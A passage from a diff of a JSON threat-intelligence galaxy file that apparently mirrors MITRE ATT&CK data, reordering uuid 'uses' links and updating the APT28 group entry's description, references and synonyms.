"estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "2c4d4e92-0ccf-4a97-b54c-86d662988a53", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "6aac77c4-eaf2-4366-8c13-ce50ab951f38", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f6fe9070-7a65-49ea-ae72-76292f42cebe", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "a127c32c-cbb0-4f9d-be07-881a792408ec", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "a257ed11-ff3b-4216-8c9d-3938ef57064c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e3a12395-188d-4051-9a16-ea8e14d07b88", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ffe742ed-9100-4686-9e00-c331da544787", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "294e2560-bd48-44b2-9da2-833b5588ad11", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b2001907-166b-4d71-bb3c-9d26c871de09", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b00f90b6-c75c-4bfd-b813-ca9e6c9ebf29", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "5a63f900-5e7e-4928-a746-dd4558e1df71", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "92d7da27-2d91-488e-a00c-059dc162766d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "d54416bd-0803-41ca-870a-ce1af7c05638", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f44731de-ea9f-406d-9b83-30ecbb9b4392", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "dc27c2ec-c5f9-4228-ba57-d67b590bda93", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "65917ae0-b854-4139-83fe-bf2441cf0196", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "6ff403bc-93e3-48be-8687-e102fdba8c88", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -4340,25 +5313,32 @@ "value": "APT32 - G0050" }, { - "description": "[APT28](https://attack.mitre.org/groups/G0007) is a threat group that has been attributed to Russia's Main Intelligence Directorate of the Russian General Staff by a July 2018 U.S. Department of Justice indictment. This group reportedly compromised the Hillary Clinton campaign, the Democratic National Committee, and the Democratic Congressional Campaign Committee in 2016 in an attempt to interfere with the U.S. presidential election. (Citation: DOJ GRU Indictment Jul 2018) (Citation: Ars Technica GRU indictment Jul 2018) (Citation: Crowdstrike DNC June 2016) (Citation: FireEye APT28) (Citation: SecureWorks TG-4127) (Citation: FireEye APT28 January 2017) (Citation: GRIZZLY STEPPE JAR) (Citation: Sofacy DealersChoice) (Citation: Palo Alto Sofacy 06-2018)", + "description": "[APT28](https://attack.mitre.org/groups/G0007) is a threat group that has been attributed to Russia's Main Intelligence Directorate of the Russian General Staff by a July 2018 U.S. Department of Justice indictment. This group reportedly compromised the Hillary Clinton campaign, the Democratic National Committee, and the Democratic Congressional Campaign Committee in 2016 in an attempt to interfere with the U.S. presidential election. [APT28](https://attack.mitre.org/groups/G0007) has been active since at least January 2007.(Citation: DOJ GRU Indictment Jul 2018) (Citation: Ars Technica GRU indictment Jul 2018) (Citation: Crowdstrike DNC June 2016) (Citation: FireEye APT28) (Citation: SecureWorks TG-4127) (Citation: FireEye APT28 January 2017) (Citation: GRIZZLY STEPPE JAR) (Citation: Sofacy DealersChoice) (Citation: Palo Alto Sofacy 06-2018) (Citation: Symantec APT28 Oct 2018)", "meta": { "external_id": "G0007", "refs": [ "https://attack.mitre.org/groups/G0007", - "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf", - "https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf", - "https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/", + "https://www.justice.gov/file/1080281/download", + "https://arstechnica.com/information-technology/2018/07/from-bitly-to-x-agent-how-gru-hackers-targeted-the-2016-presidential-election/", "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/", + "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf", "https://www.secureworks.com/research/threat-group-4127-targets-hillary-clinton-presidential-campaign", - "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part3.pdf", + "https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf", "https://www.us-cert.gov/sites/default/files/publications/JAR_16-20296A_GRIZZLY%20STEPPE-2016-1229.pdf", "https://researchcenter.paloaltonetworks.com/2018/03/unit42-sofacy-uses-dealerschoice-target-european-government-agency/", "https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/", - "https://www.justice.gov/file/1080281/download", - "https://arstechnica.com/information-technology/2018/07/from-bitly-to-x-agent-how-gru-hackers-targeted-the-2016-presidential-election/" + "https://www.symantec.com/blogs/election-security/apt28-espionage-military-government", + "https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/", + "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part3.pdf", + "https://blog.talosintelligence.com/2017/10/cyber-conflict-decoy-document.html", + "https://securelist.com/a-slice-of-2017-sofacy-activity/83930/", + "https://www.accenture.com/t20181129T203820Z__w__/us-en/_acnmedia/PDF-90/Accenture-snakemackerel-delivers-zekapab-malware.pdf#zoom=50" ], "synonyms": [ "APT28", + "SNAKEMACKEREL", + "Swallowtail", + "Group 74", "Sednit", "Sofacy", "Pawn Storm", @@ -4392,91 +5372,21 @@ "type": "uses" }, { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "dest-uuid": "6aac77c4-eaf2-4366-8c13-ce50ab951f38", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "dest-uuid": "af2ad3b7-ab6a-4807-91fd-51bcaff9acbb", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "1b7ba276-eedc-4951-a762-0ceea2c030ec", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "dc27c2ec-c5f9-4228-ba57-d67b590bda93", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "9db0cf3a-a3c9-4012-8268-123b9db6fd82", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "1608f3e1-598a-42f4-a01a-2e252e81728f", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7343e208-7cab-45f2-a47b-41ba5e2f0fab", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "2dd34b01-6110-4aac-835d-b5e7b936b0be", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "96fd6cc4-a693-4118-83ec-619e5352d07d", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "02fefddc-fb1b-423f-a76b-7552dd211d4d", + "dest-uuid": "ad255bfe-a9e6-4b52-a258-8d3462abe842", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -4490,42 +5400,14 @@ "type": "uses" }, { - "dest-uuid": "348f1eef-964b-4eb6-bb53-69b3dcb0c643", + "dest-uuid": "e669bb87-f773-4c7b-bfcc-a9ffebfdd8d4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "fe926152-f431-4baf-956c-4ad3cb0bf23b", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "20138b9d-1aac-4a26-8654-a36b6bbf2bba", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "dest-uuid": "1608f3e1-598a-42f4-a01a-2e252e81728f", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -4539,21 +5421,28 @@ "type": "uses" }, { - "dest-uuid": "59a97b15-8189-4d51-9404-e1ce8ea4a069", + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "0a68f1f1-da74-4d28-8d9a-696c082706cc", + "dest-uuid": "a1dd2dbd-1550-44bf-abcc-1a4c52e97719", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", + "dest-uuid": "edbe24e9-aec4-4994-ac75-6a6bc7f1ddd0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "dc27c2ec-c5f9-4228-ba57-d67b590bda93", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -4566,6 +5455,111 @@ ], "type": "uses" }, + { + "dest-uuid": "20138b9d-1aac-4a26-8654-a36b6bbf2bba", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "348f1eef-964b-4eb6-bb53-69b3dcb0c643", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8ae43c46-57ef-47d5-a77a-eebb35628db2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9b52fca7-1a36-4da0-b62d-da5bd83b4d69", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "d28ef391-8ed4-45dc-bc4a-2f43abf54416", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "03259939-0b57-482f-8eb5-87c0e0d54334", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8f460983-1bbb-4e7e-8094-f0b5e720f658", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "fb575479-14ef-41e9-bfab-0b7cf10bec73", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3257eb21-f9a7-4430-8de1-d8b6e288f529", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "02fefddc-fb1b-423f-a76b-7552dd211d4d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", "tags": [ @@ -4573,6 +5567,48 @@ ], "type": "uses" }, + { + "dest-uuid": "fe926152-f431-4baf-956c-4ad3cb0bf23b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "30208d3e-0d6b-43c8-883e-44462a514619", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "dcaa092b-7de9-4a21-977f-7fcb77e89c48", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "1b7ba276-eedc-4951-a762-0ceea2c030ec", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "2dd34b01-6110-4aac-835d-b5e7b936b0be", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "c23b740b-a42b-47a1-aec2-9d48ddd547ff", "tags": [ @@ -4588,112 +5624,7 @@ "type": "uses" }, { - "dest-uuid": "edbe24e9-aec4-4994-ac75-6a6bc7f1ddd0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "6aac77c4-eaf2-4366-8c13-ce50ab951f38", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "30208d3e-0d6b-43c8-883e-44462a514619", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "8ae43c46-57ef-47d5-a77a-eebb35628db2", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "af2ad3b7-ab6a-4807-91fd-51bcaff9acbb", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "a1dd2dbd-1550-44bf-abcc-1a4c52e97719", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "c8655260-9f4b-44e3-85e1-6538a5f6e4f4", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "ad255bfe-a9e6-4b52-a258-8d3462abe842", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "9b52fca7-1a36-4da0-b62d-da5bd83b4d69", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "64196062-5210-42c3-9a02-563a0d1797ef", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "dcaa092b-7de9-4a21-977f-7fcb77e89c48", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "3257eb21-f9a7-4430-8de1-d8b6e288f529", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "03259939-0b57-482f-8eb5-87c0e0d54334", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "d28ef391-8ed4-45dc-bc4a-2f43abf54416", + "dest-uuid": "0a68f1f1-da74-4d28-8d9a-696c082706cc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -4707,28 +5638,7 @@ "type": "uses" }, { - "dest-uuid": "ccd61dfc-b03f-4689-8c18-7c97eab08472", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e669bb87-f773-4c7b-bfcc-a9ffebfdd8d4", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f108215f-3487-489d-be8b-80e346d32518", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "8f460983-1bbb-4e7e-8094-f0b5e720f658", + "dest-uuid": "59a97b15-8189-4d51-9404-e1ce8ea4a069", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -4742,28 +5652,14 @@ "type": "uses" }, { - "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "2c4d4e92-0ccf-4a97-b54c-86d662988a53", + "dest-uuid": "64196062-5210-42c3-9a02-563a0d1797ef", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -4777,35 +5673,49 @@ "type": "uses" }, { - "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "dest-uuid": "7343e208-7cab-45f2-a47b-41ba5e2f0fab", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", + "dest-uuid": "96fd6cc4-a693-4118-83ec-619e5352d07d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "fb575479-14ef-41e9-bfab-0b7cf10bec73", + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "60c18d06-7b91-4742-bae3-647845cd9d81", + "dest-uuid": "c8655260-9f4b-44e3-85e1-6538a5f6e4f4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "a4f57468-fbd5-49e4-8476-52088220b92d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -4819,7 +5729,105 @@ "type": "uses" }, { - "dest-uuid": "a4f57468-fbd5-49e4-8476-52088220b92d", + "dest-uuid": "0f20e3cb-245b-4a61-8a91-2d93f7cb0e9b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "60c18d06-7b91-4742-bae3-647845cd9d81", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "d20b397a-ea47-48a9-b503-2e2a3551e11d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ccd61dfc-b03f-4689-8c18-7c97eab08472", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f108215f-3487-489d-be8b-80e346d32518", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9db0cf3a-a3c9-4012-8268-123b9db6fd82", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "2c4d4e92-0ccf-4a97-b54c-86d662988a53", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "dc31fe1e-d722-49da-8f5f-92c7b5aff534", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -4870,6 +5878,13 @@ ], "type": "uses" }, + { + "dest-uuid": "853c4192-4311-43e1-bfbb-b11b14911852", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "348f1eef-964b-4eb6-bb53-69b3dcb0c643", "tags": [ @@ -4955,14 +5970,7 @@ "type": "uses" }, { - "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "15dbf668-795c-41e6-8219-f0447c0e64ce", + "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -4975,34 +5983,6 @@ ], "type": "uses" }, - { - "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "10d51417-ee35-4589-b1ff-b6df1c334e8d", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "294e2560-bd48-44b2-9da2-833b5588ad11", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "2e45723a-31da-4a7e-aaa6-e01998a6788f", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "d54416bd-0803-41ca-870a-ce1af7c05638", "tags": [ @@ -5010,125 +5990,6 @@ ], "type": "uses" }, - { - "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "ffe742ed-9100-4686-9e00-c331da544787", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "4664b683-f578-434f-919b-1c1aad2a1111", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b77b563c-34bb-4fb8-86a3-3694338f7b47", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", - "tags": [ - 